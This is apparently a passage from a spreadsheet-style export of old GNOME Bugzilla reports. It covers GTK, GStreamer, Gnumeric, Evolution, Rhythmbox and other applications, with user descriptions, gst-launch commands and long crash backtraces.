#87 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80e4120) at gtkwidget.c:1995
#88 0xb7b3eaca in gtk_paned_forall (container=0x80e4090 include_internals=0 
    callback=0xb7c0a000  callback_data=0x0)
    at gtkpaned.c:1098
#89 0xb7a87139 in IA__gtk_container_foreach (container=0x80e4090 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#90 0xb7a890fe in gtk_container_destroy (object=0x80e4090)
    at gtkcontainer.c:829
#91 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc650c 
    invocation_hint=0xbfbc63fc marshal_data=0xb7a890c0) at gmarshal.c:77
#92 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc650c 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#93 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#94 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80e4090 emission_return=0x0 instance_and_params=0xbfbc650c)
    at gsignal.c:2554
#95 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80e4090 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#96 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#97 0xb7b3923f in gtk_object_dispose (gobject=0x80e4090) at gtkobject.c:403
#98 0xb7c12163 in gtk_widget_dispose (object=0x80e4090) at gtkwidget.c:6653
#99 0xb779cac1 in IA__g_object_run_dispose (object=0x80e4090) at gobject.c:571
#100 0xb7b391ee in IA__gtk_object_destroy (object=0x80e4090) at gtkobject.c:388
#101 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80e4090)
    at gtkwidget.c:1995
#102 0xb7b3eab7 in gtk_paned_forall (container=0x80e4000 include_internals=0 
    callback=0xb7c0a000  callback_data=0x0)
    at gtkpaned.c:1096
#103 0xb7a87139 in IA__gtk_container_foreach (container=0x80e4000 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#104 0xb7a890fe in gtk_container_destroy (object=0x80e4000)
    at gtkcontainer.c:829
#105 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc6afc 
    invocation_hint=0xbfbc69ec marshal_data=0xb7a890c0) at gmarshal.c:77
#106 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc6afc 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#107 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#108 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80e4000 emission_return=0x0 instance_and_params=0xbfbc6afc)
    at gsignal.c:2554
#109 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80e4000 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#110 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#111 0xb7b3923f in gtk_object_dispose (gobject=0x80e4000) at gtkobject.c:403
#112 0xb7c12163 in gtk_widget_dispose (object=0x80e4000) at gtkwidget.c:6653
#113 0xb779cac1 in IA__g_object_run_dispose (object=0x80e4000) at gobject.c:571
#114 0xb7b391ee in IA__gtk_object_destroy (object=0x80e4000) at gtkobject.c:388
#115 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80e4000)
    at gtkwidget.c:1995
#116 0xb7a4b880 in gtk_box_forall (container=0x80965a8 include_internals=0 
    callback=0xb7c0a000  callback_data=0x0)
    at gtkbox.c:703
#117 0xb7a87139 in IA__gtk_container_foreach (container=0x80965a8 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#118 0xb7a890fe in gtk_container_destroy (object=0x80965a8)
    at gtkcontainer.c:829
#119 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc70ec 
    invocation_hint=0xbfbc6fdc marshal_data=0xb7a890c0) at gmarshal.c:77
#120 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc70ec 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#121 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#122 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80965a8 emission_return=0x0 instance_and_params=0xbfbc70ec)
    at gsignal.c:2554
#123 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80965a8 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#124 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#125 0xb7b3923f in gtk_object_dispose (gobject=0x80965a8) at gtkobject.c:403
#126 0xb7c12163 in gtk_widget_dispose (object=0x80965a8) at gtkwidget.c:6653
#127 0xb779cac1 in IA__g_object_run_dispose (object=0x80965a8) at gobject.c:571
#128 0xb7b391ee in IA__gtk_object_destroy (object=0x80965a8) at gtkobject.c:388
#129 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80965a8)
    at gtkwidget.c:1995
#130 0xb7a47e6f in gtk_bin_forall (container=0x80b1000 include_internals=0 
    callback=0x848a3f0 callback_data=0x80cee78) at gtkbin.c:166
#131 0xb7a87139 in IA__gtk_container_foreach (container=0x80b1000 
    callback=0xb7c0a000  callback_data=0x80cee78)
    at gtkcontainer.c:1292
#132 0xb7a890fe in gtk_container_destroy (object=0x80b1000)
    at gtkcontainer.c:829
#133 0xb7c208c3 in gtk_window_destroy (object=0x80b1000) at gtkwindow.c:3828
#134 0xb77a610b in IA__g_cclosure_marshal_VOID__VOID (closure=0x806bf88 
    return_value=0x0 n_param_values=1 param_values=0xbfbc76fc 
    invocation_hint=0xbfbc75ec marshal_data=0xb7c20840) at gmarshal.c:77
#135 0xb7798cf9 in g_type_class_meta_marshal (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0xbfbc76fc 
    invocation_hint=0x80cee78 marshal_data=0x80cee78) at gclosure.c:567
#136 0xb77993b9 in IA__g_closure_invoke (closure=0x806bf88 
    return_value=0x80cee78 n_param_values=135065208 param_values=0x80cee78 
    invocation_hint=0x80cee78) at gclosure.c:490
#137 0xb77a9b3e in signal_emit_unlocked_R (node=0x806bfd0 detail=0 
    instance=0x80b1000 emission_return=0x0 instance_and_params=0xbfbc76fc)
    at gsignal.c:2554
#138 0xb77aab70 in IA__g_signal_emit_valist (instance=0x80b1000 signal_id=2 
    detail=0 var_args=) at gsignal.c:2197
#139 0xb77aaed9 in IA__g_signal_emit (instance=0x80cee78 signal_id=135065208 
    detail=135065208) at gsignal.c:2241
#140 0xb7b3923f in gtk_object_dispose (gobject=0x80b1000) at gtkobject.c:403
#141 0xb7c12163 in gtk_widget_dispose (object=0x80b1000) at gtkwidget.c:6653
#142 0xb7c19592 in gtk_window_dispose (object=0x80b1000) at gtkwindow.c:1762
#143 0xb779cac1 in IA__g_object_run_dispose (object=0x80b1000) at gobject.c:571
#144 0xb7b391ee in IA__gtk_object_destroy (object=0x80b1000) at gtkobject.c:388
#145 0xb7c0a045 in IA__gtk_widget_destroy (widget=0x80b1000)
    at gtkwidget.c:1995
#146 0xb7b18b6f in IA__gtk_main_do_event (event=0x84691e0) at gtkmain.c:1348
#147 0xb79b79da in gdk_event_dispatch (source=0x80cee78 callback=0 
    user_data=0x0) at gdkevents-x11.c:2291
#148 0xb76931cc in IA__g_main_context_dispatch (context=0x80992b0)
    at gmain.c:1916
#149 0xb769665b in g_main_context_iterate (context=0x80992b0 block=1 
    dispatch=1 self=0x8068928) at gmain.c:2547
#150 0xb76969b7 in IA__g_main_loop_run (loop=0x806ed78) at gmain.c:2751
#151 0xb7b17be1 in IA__gtk_main () at gtkmain.c:991
#152 0x0805d8d3 in main (argc=-1078181860 argv=0xbfbc401c) at main.c:93</t>
  </si>
  <si>
    <t>gconf-editor-maint</t>
  </si>
  <si>
    <t>wbolster</t>
  </si>
  <si>
    <t>GNOME-APPLETS-76819</t>
  </si>
  <si>
    <t>menu applet</t>
  </si>
  <si>
    <t>GNOME-APPLETS</t>
  </si>
  <si>
    <t>Menu bar applet missing some mnemonics</t>
  </si>
  <si>
    <t>- Couldn't middle-click anywhere within applet to drag+reposition it on
panel
- No keynav although applet itself can get focus could only give focus to
a menu by clicking on it.  Once a menu was posted arrow keys/enter/space
didn't allow me to navigate around the menu.
- Applets should have Preferences on right-click menu not Properties
- Prefs dialog should be labelled Menu Bar Preferences and all its
controls need mnemonics.
- All controls in Add Items to Menu Bar dialog need mnemonics
- Remove  menu item should be Remove  Menu...
currently you see things like Remove Applications and Remove Workspaces
which is highly ambiguous</t>
  </si>
  <si>
    <t>gnome-applets-maint</t>
  </si>
  <si>
    <t>GSTREAMER-136494</t>
  </si>
  <si>
    <t>Ogg and mp3 playback just produce static</t>
  </si>
  <si>
    <t>Current cvs doesn't allow me to play either mp3 or Ogg with gst-launch (wav
works well however). The mp3 
[cschalle@3jq3n91 test]$ gst-launch filesrc location=test.mp3 ! mad ! osssink
** (process:25876): CRITICAL **: how to remove plugins?
(process:25876): GStreamer-CRITICAL **: Factory for `mad' has no type
WARNING: erroneous pipeline: no element mad
         Trying to run anyway.
RUNNING pipeline ...
The Ogg pipeline just doesn't do anything:
[cschalle@3jq3n91 test]$ gst-launch filesrc location=police.ogg ! oggdemux
! vorbisdec ! audioconvert ! osssink
** (process:32065): CRITICAL **: how to remove plugins?
(process:32065): GStreamer-CRITICAL **: Factory for `vorbisdec' has no type
WARNING: erroneous pipeline: no element vorbisdec
         Trying to run anyway.
RUNNING pipeline ...
Execution ended after 1646 iterations (sum 347833000 ns average 211320 ns
min 53000 ns max 8612000 ns).
** (process:32065): WARNING **: opt: unlink elements in same group:
implement me</t>
  </si>
  <si>
    <t>Uraeus</t>
  </si>
  <si>
    <t>GNUMERIC-61983</t>
  </si>
  <si>
    <t>import/export Text</t>
  </si>
  <si>
    <t>save as latex don't work to me</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Gnumeric
Severity: normal
Version: 0.65
Synopsis: save as latex don't work to me
Bugzilla-Product: Gnumeric
Bugzilla-Component: Text Import/Export
Description:
 well I don't have so much experience in report bugs but I'll try to be clear.
 I have some datas in .gnumeric and it work very well but when I tried to save as 
latex that bug box appears. I tested again and bug again.
 I work with slackware 8.0 and my X interface is Window maker.
 ok that is it.
 thanks
 alex
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
[New Thread 1024 (LWP 13017)]
0x406c3689 in __wait4 () from /lib/libc.so.6
#0  0x406c3689 in __wait4 () from /lib/libc.so.6
#1  0x4072ca58 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40539366 in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
#3  
#4  0x80b386d in rendered_value_get_text () at eval.c:88
#5  0x80b38d0 in cell_get_rendered_text () at eval.c:88
#6  0x40786a90 in latex_fprintf_cell ()
   from /opt/gnome/lib/gnumeric/0.65/plugins/html/html.so
#7  0x40786e06 in latex_file_save ()
   from /opt/gnome/lib/gnumeric/0.65/plugins/html/html.so
#8  0x80a3cf7 in gnumeric_plugin_loader_module_get_type () at eval.c:88
#9  0x80a61d8 in gnumeric_plugin_loader_is_loaded () at eval.c:88
#10 0x8081eb4 in file_saver_save () at eval.c:88
#11 0x80825dc in workbook_save_as () at eval.c:88
#12 0x808e696 in gui_file_import () at eval.c:88
#13 0x808e916 in gui_file_save_as () at eval.c:88
#14 0x80dbc64 in wb_control_gui_autosave_set () at eval.c:88
#15 0x402201a9 in gtk_marshal_NONE__NONE () at eval.c:88
#16 0x4024f9ec in gtk_signal_remove_emission_hook () at eval.c:88
#17 0x4024ee55 in gtk_signal_set_funcs () at eval.c:88
#18 0x4024cf33 in gtk_signal_emit () at eval.c:88
#19 0x40283a8e in gtk_widget_activate () at eval.c:88
#20 0x40228604 in gtk_menu_shell_activate_item () at eval.c:88
#21 0x4022788a in gtk_menu_shell_deactivate () at eval.c:88
#22 0x4021fe33 in gtk_marshal_BOOL__POINTER () at eval.c:88
#23 0x4024ee93 in gtk_signal_set_funcs () at eval.c:88
#24 0x4024cf33 in gtk_signal_emit () at eval.c:88
#25 0x4028394b in gtk_widget_event () at eval.c:88
#26 0x4021fd85 in gtk_propagate_event () at eval.c:88
#27 0x4021eeee in gtk_main_do_event () at eval.c:88
#28 0x402ce127 in gdk_wm_protocols_filter () at eval.c:88
#29 0x402fc308 in g_get_current_time () at eval.c:88
#30 0x402fc913 in g_get_current_time () at eval.c:88
#31 0x402fcaac in g_main_run () at eval.c:88
#32 0x4021e7e7 in gtk_main () at eval.c:88
#33 0x80680b6 in _start () at eval.c:88
#34 0x806810e in main () at eval.c:88
#35 0x4063e2eb in __libc_start_main (main=0x80680f8  argc=1 
    ubp_av=0xbffffa44 init=0x8064b10  fini=0x8124cbc  
    rtld_fini=0x4000c130  stack_end=0xbffffa3c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x406c3689 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4072ca58 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40539366 in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x80b386d in rendered_value_get_text () at eval.c:88
No locals.
#5  0x80b38d0 in cell_get_rendered_text () at eval.c:88
88	in eval.c
No locals.
#6  0x40786a90 in latex_fprintf_cell ()
   from /opt/gnome/lib/gnumeric/0.65/plugins/html/html.so
No symbol table info available.
#7  0x40786e06 in latex_file_save ()
   from /opt/gnome/lib/gnumeric/0.65/plugins/html/html.so
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-08 22:21 -------
The original reporter (alex@rgm_a163.fmrp.usp.br) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>GTK+-115837</t>
  </si>
  <si>
    <t>Clicking outside the option menu list selects an item</t>
  </si>
  <si>
    <t>Clicking on the Default Encoding button (Preferences-General) pops up a
list.  The mouse pointer is over Cyrillic on my system.  I clicked
outside of the list hoping this would make it return to the default.  It
still selected Cyrillic.  To make things worse there was then no
Cancel option (or return to default for that matter).  I _think_ I
remembered the original setting but I'm not sure.</t>
  </si>
  <si>
    <t>revenant</t>
  </si>
  <si>
    <t>GSTREAMER-110221</t>
  </si>
  <si>
    <t>gst_caps_set should copy caps on refcount &gt; 1</t>
  </si>
  <si>
    <t>gst_caps_set changes a property of the caps withoput looking at the refcount.
In that case it changes the caps everywhere else where they are used.
That is not the desired behaviour is it?</t>
  </si>
  <si>
    <t>GLIB-503051</t>
  </si>
  <si>
    <t>gregex</t>
  </si>
  <si>
    <t>Small bug in glib interface</t>
  </si>
  <si>
    <t>A space between ?[+-] and digits is missing:
#: ../glib/gregex.c:251
msgid (?R or (?[+-]digits must be followed by )</t>
  </si>
  <si>
    <t>pedrovmm+bugzilla.gnome.org</t>
  </si>
  <si>
    <t>LIBGNOMEUI-78508</t>
  </si>
  <si>
    <t>demos</t>
  </si>
  <si>
    <t>LIBGNOMEUI</t>
  </si>
  <si>
    <t>Icon names overlap in icon list.</t>
  </si>
  <si>
    <t>Using beta3 archive-generator version 1.102.0 on Solaris 8
Filename labels overlap in Archive genertator application window when
multiple files are dragged from file manager.
If filename is 12 characters or more label overlaps with next file.
To Reproduce:
1) Start Archive generator.
2) Create 3 files all with filenames of at least 12 characters.
3) Drag these files from the file manager to the archive generator
application.
The filenames overlap and are unreadable.</t>
  </si>
  <si>
    <t>keelin.boyle</t>
  </si>
  <si>
    <t>STRAW-345507</t>
  </si>
  <si>
    <t>STRAW</t>
  </si>
  <si>
    <t>No obvious way to return from Find to main page</t>
  </si>
  <si>
    <t>There needs to be an obvious link when in Find mode to return to the main page of subscriptions.  The only way I have found so far (besides quiting the application and restarting) is to choose Find again from the (Edit &gt; Find) Menu.  This is much like using MS Start to shutdown windows not very intuitive.
Other information:</t>
  </si>
  <si>
    <t>straw-maint</t>
  </si>
  <si>
    <t>tech</t>
  </si>
  <si>
    <t>EVOLUTION-333877</t>
  </si>
  <si>
    <t>Attendees can't change his status field for a meeting</t>
  </si>
  <si>
    <t>Please describe the problem:
When someone received a meeting mail he will add the meeting to his calendar.
Then he will change his own status to tell the organizer whether he will attend
the meeting. But now he can't change it.
Steps to reproduce:
1.Launch evolution as the meeting organizer such as jeff@sun.com
2.Click Mail-&gt;New Meeting 
2.In attendee box add an attendee such as jack@freestyle.prc.sun.com and send
the meeting mail. 
3.Lauch evolution as jack@freestyle.prc.sun.com
4.Open the mail from organizer.
5.Accept the appointment
6.In calender open the meeting
7.Attendee cannot modify Status and RSVP fields.
Actual results:
Attendee cannot change his own meeting status.
Expected results:
Attendee can tell others if he would like join the meeting.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>PAN-97882</t>
  </si>
  <si>
    <t>PAN</t>
  </si>
  <si>
    <t>header pane's colors don't update when gtk theme changes</t>
  </si>
  <si>
    <t>background color isn't probably set from theme it seem to me that it
always stay white. i cannot determine if something similar happens to
foreground color too. both grouplist and article colors are set correctly.</t>
  </si>
  <si>
    <t>mtd</t>
  </si>
  <si>
    <t>EVOLUTION-268027</t>
  </si>
  <si>
    <t>Need shortcut to focus quick search bar</t>
  </si>
  <si>
    <t>Imagine you are in the ui and you want to search for messages with a
subject bug what you would do is:
ctrl+shift+q /* this clears the dialog */
bug /* type bug in the field */
[enter] /* search */
Today you have to move the mouse to the text box to do this.</t>
  </si>
  <si>
    <t>RHYTHMBOX-109517</t>
  </si>
  <si>
    <t>Crash adding to playlist</t>
  </si>
  <si>
    <t xml:space="preserve">Package: rhythmbox
Severity: normal
Version: 0.4.5
Synopsis: Crash adding to playlist
Bugzilla-Product: rhythmbox
Bugzilla-Component: General
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
I don't know if this backtrace will be of any help (no debugging symbols) but here it is...  I was adding a rather large directory of mp3's to my library and it seemed to be going fine then (as I was scrolling through the album list) it crashed.  Oh--an internet radio station was also playing as I did this (and incidentally is still playing as I write this report in bug-buddy!).
Thanks...
Debugging Information:
Backtrace was generated from '/usr/bin/rhythmbox'
#0  0x40be6b89 in wait4 () from /lib/libc.so.6
#1  0x40c5a000 in sys_sigabbrev () from /lib/libc.so.6
#2  0x4085c061 in waitpid () from /lib/libpthread.so.0
#3  0x400799fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4085d75a in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x40b739d8 in sigaction () from /lib/libc.so.6
#6  0x407ed0fd in g_array_append_vals () from /usr/lib/libglib-2.0.so.0
#7  0x4044f122 in gtk_tree_model_sort_new_with_model ()
   from /usr/lib/libgtk-x11-2.0.so.0
#8  0x4044f396 in gtk_tree_model_sort_new_with_model ()
   from /usr/lib/libgtk-x11-2.0.so.0
#9  0x40452e22 in gtk_tree_sortable_set_sort_column_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#10 0x08088b54 in rb_node_view_enable_sorting ()
#11 0x0807835f in rb_library_view_enable_sorting ()
#12 0x080797da in rb_library_view_new ()
#13 0x407c47dc in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#14 0x407b4956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#15 0x407c4406 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#16 0x407c3562 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#17 0x407c375b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#18 0x0807f7d7 in rb_library_get_type ()
#19 0x407c47dc in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#20 0x407b4956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#21 0x407c4406 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#22 0x407c3562 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#23 0x407c375b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#24 0x08081031 in rb_library_walker_thread_go ()
#25 0x40802be8 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#26 0x4080044f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#27 0x40801369 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#28 0x4080166f in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#29 0x40801cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#30 0x4025c5d1 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#31 0x0805f133 in main ()
#32 0x40b62a51 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 81926 (LWP 20494)):
#0  0x40c04a94 in write () from /lib/libc.so.6
No symbol table info available.
#1  0x40860b50 in __JCR_LIST__ () from /lib/libpthread.so.0
No symbol table info available.
#2  0x40df5ac4 in gst_esdsink_get_type ()
   from /usr/lib/gstreamer-0.6/libgstesdsink.so
No symbol table info available.
#3  0x40dbcdd3 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#4  0x4061ac12 in gst_pad_push () from /usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#5  0x40dc2f86 in gst_volume_get_type ()
   from /usr/lib/gstreamer-0.6/libgstvolume.so
No symbol table info available.
#6  0x40dbcdd3 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#7  0x4061ac12 in gst_pad_push () from /usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#8  0x40e80683 in gst_mad_get_type () from
/usr/lib/gstreamer-0.6/libgstmad.so
No symbol table info available.
#9  0x4061ac12 in gst_pad_push () from /usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#10 0x40dbc986 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#11 0x40dbc550 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#12 0x40dbc5dc in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#13 0x40dbc7b6 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#14 0x40dbe091 in _init () from
/usr/lib/gstreamer-0.6/libgstoptscheduler.so
No symbol table info available.
#15 0x40624a52 in gst_scheduler_iterate () from
/usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#16 0x406066b4 in gst_bin_get_list () from
/usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#17 0x4060688e in gst_bin_iterate () from
/usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#18 0x40627da3 in gst_thread_new () from /usr/lib/libgstreamer-0.6.so.0
No symbol table info available.
#19 0x40814cc0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x40857d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 65541 (LWP 20489)):
#0  0x40be6f11 in nanosleep () from /lib/libc.so.6
No symbol table info available.
#1  0x4085bd0d in nanosleep () from /lib/libpthread.so.0
No symbol table info available.
#2  0x40816ffa in g_usleep () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x080811b5 in rb_library_walker_thread_go ()
No symbol table info available.
#4  0x40814cc0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40857d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 20488)):
#0  0x40c04a54 in read () from /lib/libc.so.6
No symbol table info available.
#1  0x40860b50 in __JCR_LIST__ () from /lib/libpthread.so.0
No symbol table info available.
#2  0x40eab4a5 in _init () from
/usr/lib/gnome-vfs-2.0/modules/libfile.so
No symbol table info available.
#3  0x40183966 in _gnome_vfs_handle_do_read () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x4017fe7c in gnome_vfs_read_cancellable ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#5  0x40190921 in gnome_vfs_read () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#6  0x0809fde1 in ogg_helper_tell ()
No symbol table info available.
#7  0x080a00ea in ogg_helper_tell ()
No symbol table info available.
#8  0x080a0354 in ogg_helper_tell ()
No symbol table info available.
#9  0x080a0401 in id3_vfs_open ()
No symbol table info available.
#10 0x0809e05e in MP3_stream_info_impl_get_type ()
No symbol table info available.
#11 0x08095f96 in monkey_media_stream_info_get_type ()
No symbol table info available.
#12 0x407b72ae in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x407b6ae9 in g_object_newv () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x407b6fe9 in g_object_new_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x407b68ef in g_object_new () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x080960a7 in monkey_media_stream_info_new ()
No symbol table info available.
#17 0x08086bf1 in rb_node_song_new ()
No symbol table info available.
#18 0x08085ebe in rb_node_song_new ()
No symbol table info available.
#19 0x0808195b in rb_library_main_thread_new ()
No symbol table info available.
#20 0x40814cc0 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0x40857d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 20487)):
#0  0x40b73ae2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40859f35 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40856f05 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x4084f2a8 in _init () from /usr/lib/libxosd.so.2
No symbol table info available.
#4  0x40857d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 20486)):
#0  0x40c0ab1e in select () from /lib/libc.so.6
No symbol table info available.
#1  0x409b2da8 in _XlcPublicMethods () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#2  0x4092a26d in _XRead () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#3  0x40929f0b in _XReadEvents () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#4  0x409287bd in XWindowEvent () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#5  0x4084f0f6 in _init () from /usr/lib/libxosd.so.2
No symbol table info available.
#6  0x40857d53 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 20485)):
#0  0x40c092c0 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40857a8e in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 20484)):
#0  0x40be6b89 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40c5a000 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x4085c061 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400799fa in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4085d75a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40b739d8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x407ed0fd in g_array_append_vals () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x4044f122 in gtk_tree_model_sort_new_with_model ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x4044f396 in gtk_tree_model_sort_new_with_model ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#9  0x40452e22 in gtk_tree_sortable_set_sort_column_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#10 0x08088b54 in rb_node_view_enable_sorting ()
No symbol table info available.
#11 0x0807835f in rb_library_view_enable_sorting ()
No symbol table info available.
#12 0x080797da in rb_library_view_new ()
No symbol table info available.
#13 0x407c47dc in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x407b4956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x407c4406 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x407c3562 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x407c375b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x0807f7d7 in rb_library_get_type ()
No symbol table info available.
